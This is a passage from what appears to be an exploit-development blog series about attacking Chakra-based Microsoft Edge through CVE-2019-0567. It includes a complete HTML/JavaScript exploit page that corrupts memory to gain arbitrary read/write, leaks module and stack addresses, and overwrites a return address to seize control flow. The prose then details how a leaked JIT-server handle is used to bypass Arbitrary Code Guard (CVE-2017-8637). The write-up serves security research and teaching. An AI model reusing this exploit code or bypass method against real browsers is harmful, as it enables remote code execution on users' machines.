document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
document.write("<br>");

// Counter variable
let counter = 0x6000;

// Loop
while (counter != 0)
{
    // Store the contents of the stack
    tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

    // Print update
    document.write("[+] Stack address 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter) + " contains: 0x" + hex(tempContents[1]) + hex(tempContents[0]));
    document.write("<br>");

    // Decrement the counter
    // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
    counter -= 0x8;
}

As we can see above, we traverse the stack in the “reverse” order compared to our ChakraCore exploit in part two. Since we don’t have the luxury of already knowing where the stack limit is (the “last” address that can be used by that thread’s stack), we can’t just traverse the stack by incrementing from it. Instead, since we have leaked an address towards the “base” of the stack, we start above it and decrement (since the stack grows downwards) in the direction of the stack limit.

In other words, less technically, we have leaked an address somewhere towards the “bottom” of the stack and we want to walk towards the “top” of the stack in order to scan for return addresses. The first thing you may notice about the previous code is the arbitrary 0x6000 value. This number was found by trial and error: I started with 0x1000, ran the loop to see if the exploit crashed, and kept incrementing the number until a crash started to ensue. A crash in this case means we are likely reading from decommitted memory, which causes an access violation. The “gist” of this is to see how many bytes you can read without crashing; the return addresses within that range are the ones you can choose from. Here is how our output looks.

As we start to scroll down through the output, we can clearly see some return addresses starting to bubble up!
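The 0x6000 window was found by hand: raise the value, rerun, and stop when the tab crashes. A minimal sketch of that search, assuming a hypothetical tryRead(offset) callback that reports whether the qword at leak+offset is readable. In the real exploit a bad read simply crashes the content process, so each probe was a separate run.

```javascript
// Grow the candidate window in fixed steps until a probe fails, and return
// the largest window that was fully readable (0 if even the first fails).
// Assumes readable memory above the leak is contiguous, so probing the
// highest offset of each candidate window is enough.
function findReadableWindow(tryRead, start = 0x1000, step = 0x1000, max = 0x20000) {
  let best = 0;
  for (let size = start; size <= max; size += step) {
    if (!tryRead(size)) break; // in the browser, this is where the crash happened
    best = size;
  }
  return best;
}
```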

Since I already mentioned the “trial and error” approach in part two, which consists of overwriting a return address (after confirming it is one) and seeing if you end up controlling the instruction pointer by corrupting it, I won’t show this process here again. Just know, as mentioned, that this is just a matter of trial and error (in terms of my approach). The return address that I found worked best for me was chakra!Js::JavascriptFunction::CallFunction<1>+0x83 (again, there is no “special” way to find it. I just started corrupting return addresses with 0x4141414141414141 and checked whether the resulting access violation happened with RIP set to 0x4141414141414141, or with RSP pointing to this value).

This value can be seen in the stack leaking contents.

Why did I choose this return address? Again, it was an arduous process of taking every stack address and overwriting it until one consistently worked. Additionally, a little less anecdotally, this return address belongs to a function quite literally called CallFunction, which means it’s likely responsible for executing a function call of interpreted JavaScript. A called function executes its code and then hands execution back to the caller via the return address, so this return address is very likely to be used while our exploit runs. However, there are many other options that you could choose from.
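Because JavaScript numbers cannot hold a full 64-bit value, corrupting a return address with 0x4141414141414141 (or later with a real gadget address) means handing write64() two 32-bit halves. A minimal sketch of converting between the two forms with BigInt; splitQword() and joinQword() are hypothetical helpers, not part of the exploit.

```javascript
// Split a 64-bit BigInt into the [lo, hi] halves write64() expects
function splitQword(value) {
  const v = BigInt.asUintN(64, value);
  return [Number(v & 0xffffffffn), Number(v >> 32n)];
}

// Join [lo, hi] halves (as returned by read64()) back into one BigInt
function joinQword(lo, hi) {
  return (BigInt(hi >>> 0) << 32n) | BigInt(lo >>> 0);
}
```

With these, the final write in the exploit could be expressed as `write64(addrLo, addrHi, ...splitQword(0x4141414141414141n))`, where addrLo and addrHi stand for the target stack address.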

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Our primitives take 64-bit values as two 32-bit halves, so this gives us an easy way to pass the result back into them
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getUint32(0x0, true);   // 4-byte arbitrary read (low half)
    arrayRead[1] = dataview2.getUint32(0x4, true);   // 4-byte arbitrary read (high half)

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4-byte values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp object to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Arbitrary read to get the javascriptLibrary pointer (offset of 0x8 from type)
    javascriptLibrary = read64(typeLo+8, typeHigh);

    // Arbitrary read to get the scriptContext pointer (offset 0x430 from javascriptLibrary. Found this manually)
    scriptContext = read64(javascriptLibrary[0]+0x430, javascriptLibrary[1]);

    // Arbitrary read to get the threadContext pointer (offset 0x5c0)
    threadContext = read64(scriptContext[0]+0x5c0, scriptContext[1]);

    // Leak a pointer to a pointer on the stack from threadContext at offset 0x8f0
    // https://bugs.chromium.org/p/project-zero/issues/detail?id=1360
    // Offsets are slightly different (0x8f0 and 0x8f8 to leak stack addresses)
    stackleakPointer = read64(threadContext[0]+0x8f8, threadContext[1]);

    // Print update
    document.write("[+] Leaked stack address! type->javascriptLibrary->scriptContext->threadContext->leafInterpreterFrame: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]));
    document.write("<br>");

    // We can reliably traverse the stack 0x6000 bytes
    // Scan the stack for the return address below
    /*
    0:020> u chakra+0xd4a73
    chakra!Js::JavascriptFunction::CallFunction<1>+0x83:
    00007fff`3a454a73 488b5c2478      mov     rbx,qword ptr [rsp+78h]
    00007fff`3a454a78 4883c440        add     rsp,40h
    00007fff`3a454a7c 5f              pop     rdi
    00007fff`3a454a7d 5e              pop     rsi
    00007fff`3a454a7e 5d              pop     rbp
    00007fff`3a454a7f c3              ret
    */

    // Creating an array to store the return address because read64() returns an array of 2 32-bit values
    var returnAddress = new Uint32Array(0x4);
    returnAddress[0] = chakraLo + 0xd4a73;
    returnAddress[1] = chakraHigh;

    // Counter variable
    let counter = 0x6000;

    // Loop
    while (counter != 0)
    {
        // Store the contents of the stack
        tempContents = read64(stackleakPointer[0]+counter, stackleakPointer[1]);

        // Did we find our target return address?
        if ((tempContents[0] == returnAddress[0]) && (tempContents[1] == returnAddress[1]))
        {
            document.write("[+] Found our return address on the stack!");
            document.write("<br>");
            document.write("[+] Target stack address: 0x" + hex(stackleakPointer[1]) + hex(stackleakPointer[0]+counter));
            document.write("<br>");

            // Break the loop
            break;
        }
        else
        {
            // Decrement the counter
            // This is because the leaked stack address is near the stack base so we need to traverse backwards towards the stack limit
            counter -= 0x8;
        }
    }

    // Corrupt the return address to control RIP with 0x4141414141414141
    write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);
}
</script>

Open the updated exploit.html script and attach WinDbg before pressing the Click me to exploit CVE-2019-0567! button.

After attaching WinDbg and pressing g, go ahead and click the button (it may require clicking twice in some instances to detonate the exploit). Please note that there is a slight edge case where the return address isn’t located on the stack. So, if the debugger shows you crashing on the GetValue method, this is likely a case of that. In my testing, I found the return address 10 out of 10 times. However, it is possible, although very rare, to not encounter it once in a while.

After running exploit.html in the debugger, we can clearly see that we have overwritten a return address on the stack with 0x4141414141414141 and Edge is attempting to return into it. We have, again, successfully corrupted control-flow and can now redirect execution wherever we want in Edge. We went over all of this, as well, in part two of this blog series!

Now that we have our read/write primitive and control-flow hijacking ported to Edge, we can now begin our Edge-specific exploitation which involves many ROP chains to bypass Edge mitigations like Arbitrary Code Guard.

Arbitrary Code Guard && Code Integrity Guard

We are now at a point where our exploit has the ability to read/write memory, we control the instruction pointer, and we know where the stack is. With these primitives, exploitation would traditionally proceed as follows:

  1. Bypass ASLR to determine memory layout (done)
  2. Achieve read/write primitive (done)
  3. Locate the stack (done)
  4. Control the instruction pointer (done)
  5. Write a ROP payload to the stack (TBD)
  6. Write shellcode to the stack (or somewhere else in memory) (TBD)
  7. Mark the stack (or regions where shellcode is) as RWX (TBD)
  8. Execute shellcode (TBD)

Steps 5 through 8 are required as a result of DEP. DEP, a mitigation which has been beaten to death, separates code and data segments of memory. The stack, being a data segment of memory (it is only there to hold data), is not executable whenever DEP is enabled. Because of this, we invoke a function like VirtualProtect (via ROP) to mark the region of memory we wrote our shellcode to (which is a data segment that allows data to be written to it) as RWX. I have documented this procedure time and time again: we leak an address (or abuse non-ASLR modules, which is very rare now), we use our primitive to write to the stack (a stack-based buffer overflow in the two previous links provided), we mark the stack as RWX via ROP (the shellcode is also on the stack), and we are now allowed to execute our shellcode since it’s in a RWX region of memory. With that said, let me introduce a new mitigation into the fold - Arbitrary Code Guard (ACG).

ACG is a mitigation which prohibits any dynamically-generated RWX memory. This is manifested in a few ways, pointed out by Matt Miller in his blog post on ACG. As Matt points out:

“With ACG enabled, the Windows kernel prevents a content process from creating and modifying code pages in memory by enforcing the following policy:

  1. Code pages are immutable. Existing code pages cannot be made writable and therefore always have their intended content. This is enforced with additional checks in the memory manager that prevent code pages from becoming writable or otherwise being modified by the process itself. For example, it is no longer possible to use VirtualProtect to make an image code page become PAGE_EXECUTE_READWRITE.

  2. New, unsigned code pages cannot be created. For example, it is no longer possible to use VirtualAlloc to create a new PAGE_EXECUTE_READWRITE code page.”

What this means is that an attacker can write their shellcode to a data portion of memory (like the stack) all they want, gladly. However, the permissions needed (e.g. the memory must be explicitly marked executable by the adversary) can never be achieved with ACG enabled. At a high level, no memory permissions in Edge (specifically content processes, where our exploit lives) can be modified (we can’t write our shellcode to a code page nor can we modify a data page to execute our shellcode).

Now, you may be thinking - “Connor, instead of executing native shellcode in this manner, why don’t you just use WinExec like in your previous exploit from part two of this blog series to spawn cmd.exe or some other application to download some staged DLL and just load it into the process space?” This is a perfectly valid thought - and, thus, has already been addressed by Microsoft.

Edge has another small mitigation known as “no child processes”. This nukes any ability to spawn a child process to go inject some shellcode into another process, or load a DLL. Not only that, even if there was no mitigation for child processes, there is a “sister” mitigation to ACG called Code Integrity Guard (CIG) which also is present in Edge.

CIG essentially says that only Microsoft-signed DLLs can be loaded into the process space. So, even if we could reach out and retrieve a staged DLL and get it onto the system, we couldn’t load it into the content process, as the DLL isn’t a signed DLL (assuming the DLL is a malicious one, it wouldn’t be signed).

So, to summarize, in Edge we cannot:

  1. Use VirtualProtect to mark the stack where our shellcode is as RWX in order to execute it
  2. Use VirtualProtect to make a code page (RX memory) writable in order to write our shellcode to this region of memory (using something like a WriteProcessMemory ROP chain)
  3. Allocate RWX memory within the current process space using VirtualAlloc
  4. Allocate RW memory with VirtualAlloc and then mark it as RX
  5. Allocate RX memory with VirtualAlloc and then mark it as RW
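The restrictions above can be summarised as a small policy check. This is a simplified model written for illustration (an assumption, not how the Windows memory manager implements ACG): it only captures the rules from Matt Miller’s description, namely that no new executable memory can be allocated, data pages cannot become executable, and executable pages cannot become writable.

```javascript
// Page-protection names as used by VirtualAlloc/VirtualProtect
const EXECUTABLE = new Set([
  "PAGE_EXECUTE", "PAGE_EXECUTE_READ", "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY",
]);
const WRITABLE = new Set([
  "PAGE_READWRITE", "PAGE_WRITECOPY", "PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY",
]);

// New executable memory cannot be allocated (e.g. VirtualAlloc with RX or RWX)
function acgAllowsAlloc(protect) {
  return !EXECUTABLE.has(protect);
}

// No page may gain execute permission, and no executable page may become
// writable (e.g. via VirtualProtect)
function acgAllowsProtect(oldProtect, newProtect) {
  if (EXECUTABLE.has(newProtect) && !EXECUTABLE.has(oldProtect)) return false; // data -> code
  if (EXECUTABLE.has(oldProtect) && WRITABLE.has(newProtect)) return false;    // code -> writable
  return true;
}
```

Each item in the list maps to one rejected call in this model, for example `acgAllowsProtect("PAGE_READWRITE", "PAGE_EXECUTE_READ")` for item 4.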

With the advent of all three of these mitigations, previous exploitation strategies are all thrown out of the window. Let’s talk about how this changes our exploit strategy, now knowing we cannot just execute shellcode directly within the content process.

CVE-2017-8637 - Combining Vulnerabilities

As we hinted at, and briefly touched on earlier in this blog post, we know that something has to be done about JIT code with ACG enabled. This is because, by default, JIT code is generated as RWX. If we think about it, JIT’d code first starts out as an “empty” allocation (just like when we allocate some memory with VirtualAlloc). This memory is first marked as RW (it is writable because Chakra needs to actually write the code that will be executed into the allocation). Since there is no execute permission on this RW allocation, and this allocation has code that needs to be executed, the JIT engine has to change the region of memory to RX after it’s generated. This means the JIT engine has to generate dynamic code that has its memory permissions changed. Because of this, no JIT code can really be generated in an Edge process with ACG enabled. As pointed out in Matt’s blog post (and briefly mentioned by us), this architectural issue was addressed as follows:

“Modern web browsers achieve great performance by transforming JavaScript and other higher-level languages into native code. As a result, they inherently rely on the ability to generate some amount of unsigned native code in a content process. Enabling JIT compilers to work with ACG enabled is a non-trivial engineering task, but it is an investment that we’ve made for Microsoft Edge in the Windows 10 Creators Update. To support this, we moved the JIT functionality of Chakra into a separate process that runs in its own isolated sandbox. The JIT process is responsible for compiling JavaScript to native code and mapping it into the requesting content process. In this way, the content process itself is never allowed to directly map or modify its own JIT code pages.”

As we have already seen in this blog post, two processes are generated (JIT server and content process) and the JIT server is responsible for taking the JavaScript code from the content process and transforming it into machine code. This machine code is then mapped back into the content process with appropriate permissions (like that of the .text section, RX). The vulnerability (CVE-2017-8637) mentioned in this section of the blog post took advantage of a flaw in this architecture to compromise Edge fully and, thus, bypass ACG. Let’s talk a bit about the architecture of the JIT server and content process communication channel first (please note that this vulnerability has been patched).

The last thing to note, however, is where Matt says that the JIT process was moved “…into a separate process that runs in its own isolated sandbox”. Notice how Matt did not say that it was moved into an ACG-compliant process (as we know, ACG isn’t compatible with JIT). Although the JIT process may be “sandboxed”, it does not have ACG enabled. It does, however, have CIG and “no child processes” enabled. We will be taking advantage of the fact the JIT process doesn’t (and still to this day doesn’t, although the new V8 version of Edge only has ACG support in a special mode) have ACG enabled. With our ACG bypass, we will leverage a vulnerability with the way Chakra-based Edge managed communications (specifically via a process handle stored within the content process) to and from the JIT server. With that said, let’s move on.

Leaking The JIT Server Handle

The content process uses an RPC channel in order to communicate with the JIT server/process. I found this out by opening chakra.dll within IDA and searching for any functions which looked interesting and contained the word “JIT”. I found an interesting function named JITManager::ConnectRpcServer. What stood out to me immediately was a call to the function DuplicateHandle within JITManager::ConnectRpcServer.

If we look at ChakraCore we can see the source (which should be close between Chakra and ChakraCore) for this function. What was very interesting about this function is the fact that the first argument this function accepts is seemingly a “handle to the JIT process”.

Since chakra.dll contains the functionality of the Chakra JavaScript engine and since chakra.dll, as we know, is loaded into the content process, this functionality is accessible through the content process (where our exploit is running). This implies that, at some point, the content process is doing something with what seems to be a handle to the JIT server. However, we know that the value of jitProcessHandle is supplied by the caller (e.g. the function which actually invokes JITManager::ConnectRpcServer). Using IDA, we can look for cross-references to this function to see what function is responsible for calling JITManager::ConnectRpcServer.

Taking a look at the above image, we can see the function ScriptEngine::SetJITConnectionInfo is responsible for calling JITManager::ConnectRpcServer and, thus, also for providing the JIT handle to the function. Let’s look at ScriptEngine::SetJITConnectionInfo to see exactly how this function provides the JIT handle to JITManager::ConnectRpcServer.

We know that the __fastcall calling convention is in use, and that the first argument of JITManager::ConnectRpcServer (as we saw in the ChakraCore code) is where the JIT handle goes. So, if we look at the above image, whatever is in RCX directly prior to the call to JITManager::ConnectRpcServer will be the JIT handle. We can see this value is gathered from a symbol called s_jitManager.
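The register reasoning above follows from the Microsoft x64 calling convention, which x64 Windows binaries use regardless of the __fastcall annotation: the first four integer or pointer arguments go in RCX, RDX, R8 and R9, and the rest are passed on the stack above a 32-byte shadow space. A small sketch mapping argument positions to locations, using DuplicateHandle (which ConnectRpcServer calls) as the example; the helper names are hypothetical.

```javascript
// DuplicateHandle parameters, in declaration order
const DUPLICATE_HANDLE_PARAMS = [
  "hSourceProcessHandle", "hSourceHandle", "hTargetProcessHandle",
  "lpTargetHandle", "dwDesiredAccess", "bInheritHandle", "dwOptions",
];

// Location of the argument at a zero-based index, as seen at the call site
function argLocation(index) {
  const regs = ["rcx", "rdx", "r8", "r9"];
  if (index < regs.length) return regs[index];
  // Just before the call instruction, argument 5 sits at [rsp+20h] (right
  // after the 32-byte shadow space), argument 6 at [rsp+28h], and so on
  return "[rsp+" + (0x20 + 8 * (index - 4)).toString(16) + "h]";
}

function describeCall(params) {
  return params.map((name, i) => name + " -> " + argLocation(i));
}
```

Under this mapping the first argument of JITManager::ConnectRpcServer arrives in RCX, and the fourth DuplicateHandle argument, lpTargetHandle, is passed in R9.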

We know that s_jitManager is the value that is going to be passed to the JITManager::ConnectRpcServer function in the RCX register, meaning that this symbol has to contain the handle to the JIT server. Let’s look once more at JITManager::ConnectRpcServer (this time with some additional annotation).

We already know that RCX = s_jitManager when this function is executed. Looking deeper into the disassembly (almost directly before the DuplicateHandle call) we can see that s_jitManager+0x8 (a.k.a RCX at an offset of 0x8) is loaded into R14. R14 is then used as the lpTargetHandle parameter for the call to DuplicateHandle. Let’s take a look at DuplicateHandle’s prototype (don’t worry if this is confusing, I will provide a summation of the findings very shortly to make sense of this).

If we take a look at the description above, the lpTargetHandle will “…receive the duplicate handle…”. What this means is that DuplicateHandle is used in this case to duplicate a handle to the JIT server and store the duplicated handle within s_jitManager+0x8 (a.k.a. the content process will have a handle to the JIT server). We can base this on two things. The first is anecdotal evidence through the name of the variable we located in ChakraCore, which is jitProcessHandle. Although Chakra isn’t identical to ChakraCore in every regard, Chakra is following the same convention here. Instead, however, of directly supplying the jitProcessHandle, Chakra seems to manage this information through a structure called s_jitManager. The second way we can confirm this is through hard evidence.

If we examine chakra!JITManager::s_jitManager+0x8 (where we have hypothesized the duplicated JIT handle will go) within WinDbg, we can clearly see that this is a handle to a process with PROCESS_DUP_HANDLE access. We can also use Process Hacker to examine the handles to and from MicrosoftEdgeCP.exe. First, run Process Hacker as an administrator. From there, double-click on the MicrosoftEdgeCP.exe content process (the one using the most RAM as we saw, PID 4172 in this case). From there, click on the Handles tab and then sort the handles numerically via the Handle tab by clicking on it until they are in ascending order.

If we then scroll down in this list of handles, we can see our handle of 0x314. Looking at the Name column, we can also see that this is a handle to another MicrosoftEdgeCP.exe process. Since we know there are only two (whenever exploit.html is spawned and no other tabs are open) instances of MicrosoftEdgeCP.exe, the other “content process” (as we saw earlier) must be our JIT server (PID 7392)!

Another way to confirm this is by clicking on the General tab of our content process (PID 4172). From there, we can click on the Details button next to Mitigation policies to confirm that ACG (called “Dynamic code prohibited” here) is enabled for the content process where our exploit is running.

However, if we look at the other content process (which should be our JIT server), we can confirm ACG is not enabled. This tells us exactly which process is our JIT server and which one is our content process. From now on, no matter how many instances of Edge are running on a given machine, a content process will always have a PROCESS_DUP_HANDLE handle to the JIT server located at chakra!JITManager::s_jitManager+0x8.

So, in summation, we know that s_jitManager+0x8 contains a handle to the JIT server, and it is readable from the content process (where our exploit is running). You may also be asking “why does the content process need to have a PROCESS_DUP_HANDLE handle to the JIT server?” We will come to this shortly.

Turning our attention back to the aforementioned analysis, we know we have a handle to the JIT server. You may be thinking - we could essentially just use our arbitrary read primitive to obtain this handle and then use it to perform some operations on the JIT process, since the JIT process doesn’t have ACG enabled! This may sound very enticing at first. However, let’s take a look at a malicious function like VirtualAllocEx for a second, which can allocate memory within a remote process via a supplied process handle (which we have). VirtualAllocEx documentation states that:

The handle must have the PROCESS_VM_OPERATION access right. For more information, see Process Security and Access Rights.

This “kills” our idea in its tracks - the handle we have only has the permission PROCESS_DUP_HANDLE. We don’t have the access rights to allocate memory in a remote process where perhaps ACG is disabled (like the JIT server). However, due to a vulnerability (CVE-2017-8637), there is actually a way we can abuse the handle stored within s_jitManager+0x8 (which is a handle to the JIT server). To understand this, let’s just take a few moments to understand why we even need a handle to the JIT server, from the content process, in the first place.
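Access rights are bit flags in a handle’s granted-access mask, and the requirement quoted above boils down to a bitwise test. A minimal sketch using a subset of the documented process access-right constants; decodeAccess() and hasAccess() are hypothetical helpers, and the real kernel check involves more than this single comparison.

```javascript
// Subset of the documented process access rights
const PROCESS_RIGHTS = {
  PROCESS_TERMINATE: 0x0001,
  PROCESS_CREATE_THREAD: 0x0002,
  PROCESS_VM_OPERATION: 0x0008,
  PROCESS_VM_READ: 0x0010,
  PROCESS_VM_WRITE: 0x0020,
  PROCESS_DUP_HANDLE: 0x0040,
  PROCESS_CREATE_PROCESS: 0x0080,
  PROCESS_QUERY_INFORMATION: 0x0400,
  PROCESS_QUERY_LIMITED_INFORMATION: 0x1000,
};

// Names of the rights present in a granted-access mask
function decodeAccess(mask) {
  return Object.entries(PROCESS_RIGHTS)
    .filter(([, bit]) => (mask & bit) !== 0)
    .map(([name]) => name);
}

// True only if every required bit is present in the granted mask
function hasAccess(granted, required) {
  return (granted & required) === required;
}
```

A handle granting only PROCESS_DUP_HANDLE (mask 0x40) therefore fails the PROCESS_VM_OPERATION (0x8) requirement of VirtualAllocEx.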

Let’s now turn our attention to this Google Project Zero issue regarding the CVE.

We know that the JIT server (a different process) needs to map JIT’d code into the content process. As the issue explains:

In order to be able to map executable memory in the calling process, JIT process needs to have a handle of the calling process. So how does it get that handle? It is sent by the calling process as part of the ThreadContext structure. In order to send its handle to the JIT process, the calling process first needs to call DuplicateHandle on its (pseudo) handle.

The above is self-explanatory. If you want to do process injection (e.g. map code into another process) you need a handle to that process. So, in the case of the JIT server - the JIT server knows it is going to need to inject some code into the content process. In order to do this, the JIT server needs a handle to the content process with permissions such as PROCESS_VM_OPERATION. So, in order for the JIT process to have a handle to the content process, the content process (as mentioned above) shares it with the JIT process. However, this is where things get interesting.

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle. According to Microsoft, a pseudo handle:

… is a special constant, currently (HANDLE)-1, that is interpreted as the current process handle.

So, in other words, a pseudo handle is a handle to the current process and it is only valid within the context of the process it is generated in. So, for example, if the content process called GetCurrentProcess to obtain a pseudo handle which represents the content process (essentially a handle to itself), this pseudo handle wouldn’t be valid within the JIT process. This is because the pseudo handle only represents a handle to the process which called GetCurrentProcess. If GetCurrentProcess is called in the JIT process, the handle generated is only valid within the JIT process. It is just an “easy” way for a process to specify a handle to the current process. If you supplied this pseudo handle in a call to WriteProcessMemory, for instance, you would tell WriteProcessMemory “hey, any memory you are about to write to is found within the current process”. Additionally, this pseudo handle has PROCESS_ALL_ACCESS permissions.
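To make the constant concrete: on x64, (HANDLE)-1 is the all-ones 64-bit pattern, so in the [low, high] form that read64() returns both halves are 0xffffffff. A minimal sketch of recognising it; isCurrentProcessPseudoHandle() is a hypothetical helper.

```javascript
// (HANDLE)-1 reinterpreted as an unsigned 64-bit value: 0xffffffffffffffff
const CURRENT_PROCESS_PSEUDO_HANDLE = BigInt.asUintN(64, -1n);

// Check a value held as [lo, hi] 32-bit halves against the pseudo handle
function isCurrentProcessPseudoHandle(lo, hi) {
  const value = (BigInt(hi >>> 0) << 32n) | BigInt(lo >>> 0);
  return value === CURRENT_PROCESS_PSEUDO_HANDLE;
}
```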

Now that we know what a pseudo handle is, let’s revisit this sentiment:

The way the content process will give its handle to the JIT server is by duplicating its own pseudo handle.

What the content process will do is obtain its pseudo handle by calling GetCurrentProcess (which is only valid within the content process). This handle is then used in a call to DuplicateHandle. In other words, the content process will duplicate its pseudo handle. You may be thinking, however, “Connor you just told me that a pseudo handle can only be used by the process which called GetCurrentProcess. Since the content process called GetCurrentProcess, the pseudo handle will only be valid in the content process. We need a handle to the content process that can be used by another process, like the JIT server. How does duplicating the handle change the fact this pseudo handle can’t be shared outside of the content process, even though we are duplicating the handle?”

The answer is pretty straightforward - if we look in the GetCurrentProcess Remarks section we can see the following text:

A process can create a “real” handle to itself that is valid in the context of other processes, or that can be inherited by other processes, by specifying the pseudo handle as the source handle in a call to the DuplicateHandle function.

So, even though the pseudo handle only represents a handle to the current process and is only valid within the current process, the DuplicateHandle function has the ability to convert this pseudo handle, which is only valid within the current process (in our case, the current process is the content process where the pseudo handle to be duplicated exists) into an actual or real handle which can be leveraged by other processes. This is exactly why the content process will duplicate its pseudo handle - it allows the content process to create an actual handle to itself, with PROCESS_ALL_ACCESS permissions, which can be actively used by other processes (in our case, this duplicated handle can be used by the JIT server to map JIT’d code into the content process).

So, in short, it’s possible for the content process to call GetCurrentProcess (which returns a pseudo handle with PROCESS_ALL_ACCESS to the content process) and then use DuplicateHandle to duplicate this handle for the JIT server to use. However, where things get interesting is the third parameter of DuplicateHandle, which is hTargetProcessHandle. This parameter has the following description:

A handle to the process that is to receive the duplicated handle. The handle must have the PROCESS_DUP_HANDLE access right…

In our case, we know that the “process that is to receive the duplicated handle” is the JIT server. After all, we are trying to send a (duplicated) content process handle to the JIT server. This means that when the content process calls DuplicateHandle in order to duplicate its handle for the JIT server to use, it must pass, as hTargetProcessHandle, a handle to the JIT server that has PROCESS_DUP_HANDLE access. If this doesn’t make sense, re-read the description of hTargetProcessHandle: this parameter requires a handle (specifically one with PROCESS_DUP_HANDLE permissions) to the process the duplicated handle is going to.

This means, in fewer words, that if the content process wants to call DuplicateHandle in order to share its handle with the JIT server so that the JIT server can map JIT’d code into the content process, the content process also needs a PROCESS_DUP_HANDLE handle to the JIT server.

This is the exact reason why the s_jitManager structure in the content process contains a PROCESS_DUP_HANDLE to the JIT server. Since the content process now has a PROCESS_DUP_HANDLE handle to the JIT server (s_jitManager+0x8), this s_jitManager+0x8 handle can be passed in to the hTargetProcessHandle parameter when the content process duplicates its handle via DuplicateHandle for the JIT server to use. So, to answer our initial question - the reason why this handle exists (why the content process has a handle to the JIT server) is so DuplicateHandle calls succeed where content processes need to send their handle to the JIT server!
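To make this requirement concrete, here is a toy C model of the precondition described above. It is only a sketch: the access-right values match the Windows SDK’s winnt.h, but duplicate_handle_allowed is a hypothetical helper that encodes the two documented PROCESS_DUP_HANDLE requirements, not how the kernel actually performs the check.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Access-right values from the Windows SDK (winnt.h). */
#define PROCESS_DUP_HANDLE                0x0040u
#define PROCESS_QUERY_LIMITED_INFORMATION 0x1000u
#define PROCESS_ALL_ACCESS                0x001FFFFFu

/* Hypothetical helper encoding DuplicateHandle's documented preconditions:
 * both hSourceProcessHandle and hTargetProcessHandle need PROCESS_DUP_HANDLE. */
static bool duplicate_handle_allowed(uint32_t source_process_access,
                                     uint32_t target_process_access) {
    return (source_process_access & PROCESS_DUP_HANDLE) != 0 &&
           (target_process_access & PROCESS_DUP_HANDLE) != 0;
}
```

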